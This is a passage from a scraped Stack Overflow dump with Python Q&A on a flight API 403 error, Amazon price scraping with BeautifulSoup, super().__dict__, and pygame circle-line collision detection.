] | stackoverflow_0074577307_pypi_python.txt |
Q:
API can't find my API key in header even though i included it
I'm trying to use the tequila API to retrieve flight prices but the server keeps returning this error:
Traceback (most recent call last):
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\main.py", line 37, in <module>
flight = flight_search.check_flights(
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\flight_search.py", line 54, in check_flights
response.raise_for_status()
File "C:\Users\Senna\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\requests\models.py", line 953, in raise_for_status
raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://tequila-api.kiwi.com/v2/search?fly_from=AMS&fly_to=CDG&date_from=15%2F08%2F2021&date_to=10%2F02%2F2022&nights_in_dst_from=7&nights_in_dst_to=28&flight_type=round&one_for_city=1&max_stopovers=0&curr=GBP
Process finished with exit code 1
this is my code:
(method in class)
def check_flights(self, origin_city_code, destination_city_code, from_time, to_time):
headers = {"apikey": TEQUILA_API_KEY}
query = {
"fly_from": origin_city_code,
"fly_to": destination_city_code,
"date_from": from_time.strftime("%d/%m/%Y"),
"date_to": to_time.strftime("%d/%m/%Y"),
"nights_in_dst_from": 7,
"nights_in_dst_to": 28,
"flight_type": "round",
"one_for_city": 1,
"max_stopovers": 0,
"curr": "GBP"
}
response = requests.get(
url="https://tequila-api.kiwi.com/v2/search",
headers=headers,
params=query,
)
response.raise_for_status()
try:
data = response.json()["data"][0]
except IndexError:
print(f"No flights found for {destination_city_code}.")
return None
flight_data = FlightData(
price=data["price"],
origin_city=data["route"][0]["cityFrom"],
origin_airport=data["route"][0]["flyFrom"],
destination_city=data["route"][0]["cityTo"],
destination_airport=data["route"][0]["flyTo"],
out_date=data["route"][0]["local_departure"].split("T")[0],
return_date=data["route"][1]["local_departure"].split("T")[0]
)
print(f"{flight_data.destination_city}: £{flight_data.price}")
return flight_data
A:
Im also doing the course and got absolutely trainwrecked on the header not being recognized.
After 2 hours of trying every possible solution to make the header reach the API I recognized that I forgot to format date_to in the correct string format.
So despite the API is giving me header not found the issue was with one of my parameters.
So just give it another go and check your code character by character against the API documentation and I am sure you will find a tiny bit that has a typo or wrong format and your request will eventually go through.
| API can't find my API key in header even though i included it | I'm trying to use the tequila API to retrieve flight prices but the server keeps returning this error:
Traceback (most recent call last):
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\main.py", line 37, in <module>
flight = flight_search.check_flights(
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\flight_search.py", line 54, in check_flights
response.raise_for_status()
File "C:\Users\Senna\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\requests\models.py", line 953, in raise_for_status
raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://tequila-api.kiwi.com/v2/search?fly_from=AMS&fly_to=CDG&date_from=15%2F08%2F2021&date_to=10%2F02%2F2022&nights_in_dst_from=7&nights_in_dst_to=28&flight_type=round&one_for_city=1&max_stopovers=0&curr=GBP
Process finished with exit code 1
this is my code:
(method in class)
def check_flights(self, origin_city_code, destination_city_code, from_time, to_time):
headers = {"apikey": TEQUILA_API_KEY}
query = {
"fly_from": origin_city_code,
"fly_to": destination_city_code,
"date_from": from_time.strftime("%d/%m/%Y"),
"date_to": to_time.strftime("%d/%m/%Y"),
"nights_in_dst_from": 7,
"nights_in_dst_to": 28,
"flight_type": "round",
"one_for_city": 1,
"max_stopovers": 0,
"curr": "GBP"
}
response = requests.get(
url="https://tequila-api.kiwi.com/v2/search",
headers=headers,
params=query,
)
response.raise_for_status()
try:
data = response.json()["data"][0]
except IndexError:
print(f"No flights found for {destination_city_code}.")
return None
flight_data = FlightData(
price=data["price"],
origin_city=data["route"][0]["cityFrom"],
origin_airport=data["route"][0]["flyFrom"],
destination_city=data["route"][0]["cityTo"],
destination_airport=data["route"][0]["flyTo"],
out_date=data["route"][0]["local_departure"].split("T")[0],
return_date=data["route"][1]["local_departure"].split("T")[0]
)
print(f"{flight_data.destination_city}: £{flight_data.price}")
return flight_data
| [
"Im also doing the course and got absolutely trainwrecked on the header not being recognized.\nAfter 2 hours of trying every possible solution to make the header reach the API I recognized that I forgot to format date_to in the correct string format.\nSo despite the API is giving me header not found the issue was with one of my parameters.\nSo just give it another go and check your code character by character against the API documentation and I am sure you will find a tiny bit that has a typo or wrong format and your request will eventually go through.\n"
] | [
0
] | [
"class FlightSearch:\n def __init__(self):\n self.code = {}\n\n def get_destination_code(self, city_name):\n location_endpoint = f\"{TEQUILA_ENDPOINT}/locations/query\"\n headers = {\"apikey\": TEQUILA_API_KEY}\n query = {\"term\": city_name, \"location_types\": \"city\"}\n response = requests.get(url=location_endpoint, headers=headers, params=query)\n results = response.json()[\"locations\"]\n code = results[0][\"code\"]\n return code\n\nI think this code missed an __init__ under the FlightSearch class. After adding this line, it worked.\n"
] | [
-1
] | [
"api",
"python"
] | stackoverflow_0068785225_api_python.txt |
Q:
Unable to get the price of a product on Amazon when using Beautiful Soup in python
I was trying to track the price of a product using beautiful soup but whenever I try to run this code, I get a 6 digit code which I assume has something to do with recaptcha. I have tried numerous times, checked the headers, the url and the tags but nothing seems to work.
from bs4 import BeautifulSoup
import requests
from os import environ
import lxml
headers = {
"User-Agent": environ.get("User-Agent"),
"Accept-Language": environ.get("Accept-Language")
}
amazon_link_address = "https://www.amazon.in/Razer-Basilisk-Wired-
Gaming-RZ01-04000100-R3M1/dp/B097F8H1MC/?
_encoding=UTF8&pd_rd_w=6H9OF&content-id=amzn1.sym.1f592895-6b7a-4b03-
9d72-1a40ea8fbeca&pf_rd_p=1f592895-6b7a-4b03-9d72-1a40ea8fbeca&pf_rd_r=1K6KK6W05VTADEDXYM3C&pd_rd_wg=IobLb&pd_rd_r=9fcac35b
-b484-42bf-ba79-a6fdd803abf8&ref_=pd_gw_ci_mcx_mr_hp_atf_m"
response = requests.get(url=amazon_link_address, headers=headers)
soup = BeautifulSoup(response.content, features="lxml").prettify()
price = soup.find("a-price-whole")
print(price)
A:
The "a-price-whole" class in inside the tags so BS4 is not able to find it. This solution worked for me, I just changed your "find" to a "find_all" and made it scan through all of the spans until you find the class you are searching for then used the iterator.get_text() to print the price. Hope this helps!
soup = BeautifulSoup(response.content, features="lxml")
price = soup.find_all("span")
for i in price:
try:
if i['class'] == ['a-price-whole']:
itemPrice = f"${str(i.get_text())[:-1]}"
break
except KeyError:
continue
print(itemPrice)
| Unable to get the price of a product on Amazon when using Beautiful Soup in python | I was trying to track the price of a product using beautiful soup but whenever I try to run this code, I get a 6 digit code which I assume has something to do with recaptcha. I have tried numerous times, checked the headers, the url and the tags but nothing seems to work.
from bs4 import BeautifulSoup
import requests
from os import environ
import lxml
headers = {
"User-Agent": environ.get("User-Agent"),
"Accept-Language": environ.get("Accept-Language")
}
amazon_link_address = "https://www.amazon.in/Razer-Basilisk-Wired-
Gaming-RZ01-04000100-R3M1/dp/B097F8H1MC/?
_encoding=UTF8&pd_rd_w=6H9OF&content-id=amzn1.sym.1f592895-6b7a-4b03-
9d72-1a40ea8fbeca&pf_rd_p=1f592895-6b7a-4b03-9d72-1a40ea8fbeca&pf_rd_r=1K6KK6W05VTADEDXYM3C&pd_rd_wg=IobLb&pd_rd_r=9fcac35b
-b484-42bf-ba79-a6fdd803abf8&ref_=pd_gw_ci_mcx_mr_hp_atf_m"
response = requests.get(url=amazon_link_address, headers=headers)
soup = BeautifulSoup(response.content, features="lxml").prettify()
price = soup.find("a-price-whole")
print(price)
| [
"The \"a-price-whole\" class in inside the tags so BS4 is not able to find it. This solution worked for me, I just changed your \"find\" to a \"find_all\" and made it scan through all of the spans until you find the class you are searching for then used the iterator.get_text() to print the price. Hope this helps!\n\n\nsoup = BeautifulSoup(response.content, features=\"lxml\")\n\nprice = soup.find_all(\"span\")\nfor i in price:\n try:\n if i['class'] == ['a-price-whole']:\n itemPrice = f\"${str(i.get_text())[:-1]}\"\n break\n except KeyError:\n continue\n\nprint(itemPrice)\n\n\n\n"
] | [
0
] | [] | [] | [
"amazon",
"bots",
"python",
"tracker",
"web_scraping"
] | stackoverflow_0074603033_amazon_bots_python_tracker_web_scraping.txt |
Q:
Why does super().__dict__ raise an AttributeError?
Why is this raising an AttributeError?
class A:
def f(self):
print(super().__dict__)
A().f() # raises AttributeError: 'super' object has no attribute '__dict__'
A:
super() delegates attribute access to the next class in MRO. In this case, object is an implicit parent class. Instances of object class do not contain the __dict__ attribute:
object().__dict__ # raises AttributeError
However, instances of empty classes do contain the __dict__ attribute, so if A inherits from an empty base class, no error is raised:
class Foo:
pass
class A(Foo):
def f(self):
print(super().__dict__)
A().f() # prints '{}'
| Why does super().__dict__ raise an AttributeError? | Why is this raising an AttributeError?
class A:
def f(self):
print(super().__dict__)
A().f() # raises AttributeError: 'super' object has no attribute '__dict__'
| [
"super() delegates attribute access to the next class in MRO. In this case, object is an implicit parent class. Instances of object class do not contain the __dict__ attribute:\nobject().__dict__ # raises AttributeError\n\nHowever, instances of empty classes do contain the __dict__ attribute, so if A inherits from an empty base class, no error is raised:\nclass Foo:\n pass\n\n\nclass A(Foo):\n def f(self):\n print(super().__dict__)\n\nA().f() # prints '{}'\n\n"
] | [
0
] | [
"I think attribute error comes many times with no reason , it happened with me so many times ....\nThe Only solution is that this method is no longer usable try to go though docs or use another one .\n"
] | [
-3
] | [
"magic_methods",
"python",
"python_descriptors"
] | stackoverflow_0074603550_magic_methods_python_python_descriptors.txt |
Q:
Trajectory plalnification
I have a program that generates circles and lines, where the circles can not collide with each other and the lines can not collide with the circles, the problem is that it only draws a line but not the others, it does not mark any error and as much as I think the reason I do not understand why, (I'm new to python, so excuse me if maybe the error is obvious)
I tried to remove the for from my CreaLin class and it does generate the lines but they all collide with the circles, I also thought that the collisionL function could be the problem since the method does not belong as such to the line class, but I need values from the circle class, so I don't know what would be another way to do it, I would like to know a method.
my code:
class CreaCir:
def __init__(self, figs):
self.figs = figs
def update(self):
if len(self.figs) <70:
choca = False
r = randint(5, 104)
x = randint(0, 600 + r)
y = randint(0, 400 + r)
creOne = Circulo(x, y, r)
for fig in (self.figs):
choca = creOne.colisionC(fig)
if choca == True:
break
if choca == False:
self.figs.append(creOne)
def dibujar(self, ventana):
pass
class CreaLin:
def __init__(self, lins):
self.lins = lins
def update(self):
if len(self.lins) <70:
choca = False
x = randint(0, 700)
y = randint(0, 500)
a = randint(0, 700)
b = randint(0, 500)
linOne = Linea(x, y, a, b)
for lin in (self.lins):
choca = linOne.colisionL(lin)
if choca == True:
break
if choca == False:
self.lins.append(linOne)
def dibujar(self, ventana):
pass
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.ven.fill(pg.Color('#404040'))
self.figs = []
self.lins = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
pg.display.flip()
def run(self):
cirCreater = CreaCir(self.figs)
linCreater = CreaLin(self.lins)
while True:
self.check_events()
cirCreater.update()
linCreater.update()
for fig in self.figs:
fig.dibujar(self.ven)
for lin in self.lins:
lin.dibujar(self.ven)
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
class Circulo:
class Circulo(PosGeo):
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
else:
return True`
and finally my class line:
class Linea(PosGeo):
def __init__(self, x, y, a, b):
super().__init__(x, y)
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionL(self, l1):
pass
Result:
A:
You need to implement the colisionC and colisionL methods in Linea and Circulo. See Problem with calculating line intersections for the line-line intersection algorithm. When checking for collisions between lines and circles, in addition to checking for collisions between circles and endless lines, you must also consider the beginning and end of the line segment:
class Linea:
# [...]
def colisionC(self, c2):
return c2.colisionL(self)
def colisionL(self, l1):
return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))
def intersect_line_line(P0, P1, Q0, Q1):
d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0])
if d == 0:
return None
t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d
u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d
if 0 <= t <= 1 and 0 <= u <= 1:
return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)
return None
class Circulo
# [...]
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:
return True
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
sign = lambda x: -1 if x < 0 else 1
xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)
yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)
ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr
tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr
return 0 < ta < dr or 0 < tb < dr
Put all objects into one container. Before you add a new Linea you have to check if the new "Line" intersects another object with "ColisionL". Before you add a new Circulo, you must check if the new "Line" intersects another object with CollisionC:
class CreaObjects:
def __init__(self, figs):
self.figs = figs
self.no_lines = 0
self.no_circles = 0
def update(self):
if self.no_circles <70:
r = randint(5, 104)
creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)
if not any(fig.colisionC(creOne) for fig in self.figs):
self.figs.append(creOne)
self.no_circles += 1
if self.no_lines <70:
linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))
if not any(fig.colisionL(linOne) for fig in self.figs):
self.figs.append(linOne)
self.no_lines += 1
Complete example:
import pygame as pg
from random import randint
from math import sqrt, hypot
class Linea:
def __init__(self, x, y, a, b):
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionC(self, c2):
return c2.colisionL(self)
def colisionL(self, l1):
return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))
def intersect_line_line(P0, P1, Q0, Q1):
d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0])
if d == 0:
return None
t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d
u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d
if 0 <= t <= 1 and 0 <= u <= 1:
return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)
return None
class Circulo:
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:
return True
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
sign = lambda x: -1 if x < 0 else 1
xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)
yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)
ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr
tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr
return 0 < ta < dr or 0 < tb < dr
class CreaObjects:
def __init__(self, figs):
self.figs = figs
self.no_lines = 0
self.no_circles = 0
def update(self):
if self.no_circles <70:
r = randint(5, 104)
creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)
if not any(fig.colisionC(creOne) for fig in self.figs):
self.figs.append(creOne)
self.no_circles += 1
if self.no_lines <70:
linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))
if not any(fig.colisionL(linOne) for fig in self.figs):
self.figs.append(linOne)
self.no_lines += 1
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.figs = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
def run(self):
cirCreater = CreaObjects(self.figs)
while True:
self.check_events()
cirCreater.update()
self.ven.fill(pg.Color('#404040'))
for fig in self.figs:
fig.dibujar(self.ven)
pg.display.flip()
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
| Trajectory plalnification | I have a program that generates circles and lines, where the circles can not collide with each other and the lines can not collide with the circles, the problem is that it only draws a line but not the others, it does not mark any error and as much as I think the reason I do not understand why, (I'm new to python, so excuse me if maybe the error is obvious)
I tried to remove the for from my CreaLin class and it does generate the lines but they all collide with the circles, I also thought that the collisionL function could be the problem since the method does not belong as such to the line class, but I need values from the circle class, so I don't know what would be another way to do it, I would like to know a method.
my code:
class CreaCir:
def __init__(self, figs):
self.figs = figs
def update(self):
if len(self.figs) <70:
choca = False
r = randint(5, 104)
x = randint(0, 600 + r)
y = randint(0, 400 + r)
creOne = Circulo(x, y, r)
for fig in (self.figs):
choca = creOne.colisionC(fig)
if choca == True:
break
if choca == False:
self.figs.append(creOne)
def dibujar(self, ventana):
pass
class CreaLin:
def __init__(self, lins):
self.lins = lins
def update(self):
if len(self.lins) <70:
choca = False
x = randint(0, 700)
y = randint(0, 500)
a = randint(0, 700)
b = randint(0, 500)
linOne = Linea(x, y, a, b)
for lin in (self.lins):
choca = linOne.colisionL(lin)
if choca == True:
break
if choca == False:
self.lins.append(linOne)
def dibujar(self, ventana):
pass
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.ven.fill(pg.Color('#404040'))
self.figs = []
self.lins = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
pg.display.flip()
def run(self):
cirCreater = CreaCir(self.figs)
linCreater = CreaLin(self.lins)
while True:
self.check_events()
cirCreater.update()
linCreater.update()
for fig in self.figs:
fig.dibujar(self.ven)
for lin in self.lins:
lin.dibujar(self.ven)
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
class Circulo:
class Circulo(PosGeo):
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
else:
return True`
and finally my class line:
class Linea(PosGeo):
def __init__(self, x, y, a, b):
super().__init__(x, y)
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionL(self, l1):
pass
Result:
| [
"You need to implement the colisionC and colisionL methods in Linea and Circulo. See Problem with calculating line intersections for the line-line intersection algorithm. When checking for collisions between lines and circles, in addition to checking for collisions between circles and endless lines, you must also consider the beginning and end of the line segment:\nclass Linea:\n # [...]\n\n def colisionC(self, c2):\n return c2.colisionL(self)\n \n def colisionL(self, l1):\n return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))\n \n def intersect_line_line(P0, P1, Q0, Q1): \n d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \n if d == 0:\n return None\n t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\n u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\n if 0 <= t <= 1 and 0 <= u <= 1:\n return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\n return None\n\nclass Circulo\n # [...]\n\n def colisionC(self, c2):\n return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))\n \n def colisionL(self, L2):\n l0 = [L2.x, L2.y]\n l1 = [L2.a, L2.b]\n cp = [self.cx, self.cy]\n x1 = l0[0] - cp[0]\n y1 = l0[1] - cp[1]\n x2 = l1[0] - cp[0]\n y2 = l1[1] - cp[1]\n if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:\n return True\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = self.radio*self.radio*dr*dr - D*D\n if discriminant < 0:\n return False\n \n sign = lambda x: -1 if x < 0 else 1\n xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n return 0 < ta < dr or 0 < tb < dr\n\nPut all objects into one container. Before you add a new Linea you have to check if the new \"Line\" intersects another object with \"ColisionL\". Before you add a new Circulo, you must check if the new \"Line\" intersects another object with CollisionC:\nclass CreaObjects:\n def __init__(self, figs):\n self.figs = figs\n self.no_lines = 0\n self.no_circles = 0\n \n def update(self):\n if self.no_circles <70:\n r = randint(5, 104)\n creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)\n if not any(fig.colisionC(creOne) for fig in self.figs):\n self.figs.append(creOne)\n self.no_circles += 1\n \n if self.no_lines <70:\n linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))\n if not any(fig.colisionL(linOne) for fig in self.figs):\n self.figs.append(linOne)\n self.no_lines += 1 \n\n\nComplete example:\n\nimport pygame as pg\nfrom random import randint\nfrom math import sqrt, hypot\n\nclass Linea:\n def __init__(self, x, y, a, b):\n self.x = x\n self.y = y\n self.a = a\n self.b = b\n\n def dibujar(self, ventana):\n pg.draw.line(ventana, \"#7B0000\", (self.x, self.y), (self.a, self.b))\n\n def update(self):\n pass\n\n def colisionC(self, c2):\n return c2.colisionL(self)\n \n def colisionL(self, l1):\n return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))\n \n def intersect_line_line(P0, P1, Q0, Q1): \n d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \n if d == 0:\n return None\n t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\n u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\n if 0 <= t <= 1 and 0 <= u <= 1:\n return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\n return None\n\nclass Circulo:\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.radio = r\n self.cx = x+r\n self.cy = y+r\n\n def __str__(self):\n return f\"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}\"\n\n def dibujar(self, ventana):\n pg.draw.circle(ventana, \"white\", (self.cx, self.cy), self.radio, 1)\n pg.draw.line(ventana, \"white\", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))\n pg.draw.line(ventana, \"white\", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))\n\n def update(self):\n pass\n\n def colisionC(self, c2):\n return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))\n \n def colisionL(self, L2):\n l0 = [L2.x, L2.y]\n l1 = [L2.a, L2.b]\n cp = [self.cx, self.cy]\n x1 = l0[0] - cp[0]\n y1 = l0[1] - cp[1]\n x2 = l1[0] - cp[0]\n y2 = l1[1] - cp[1]\n if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:\n return True\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = self.radio*self.radio*dr*dr - D*D\n if discriminant < 0:\n return False\n \n sign = lambda x: -1 if x < 0 else 1\n xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n return 0 < ta < dr or 0 < tb < dr\n\nclass CreaObjects:\n def __init__(self, figs):\n self.figs = figs\n self.no_lines = 0\n self.no_circles = 0\n \n def update(self):\n if self.no_circles <70:\n r = randint(5, 104)\n creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)\n if not any(fig.colisionC(creOne) for fig in self.figs):\n self.figs.append(creOne)\n self.no_circles += 1\n \n if self.no_lines <70:\n linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))\n if not any(fig.colisionL(linOne) for fig in self.figs):\n self.figs.append(linOne)\n self.no_lines += 1 \n\nclass Ventana:\n def __init__(self, Ven_Tam= (700, 500)):\n \n pg.init()\n self.ven_tam = Ven_Tam\n\n self.ven = 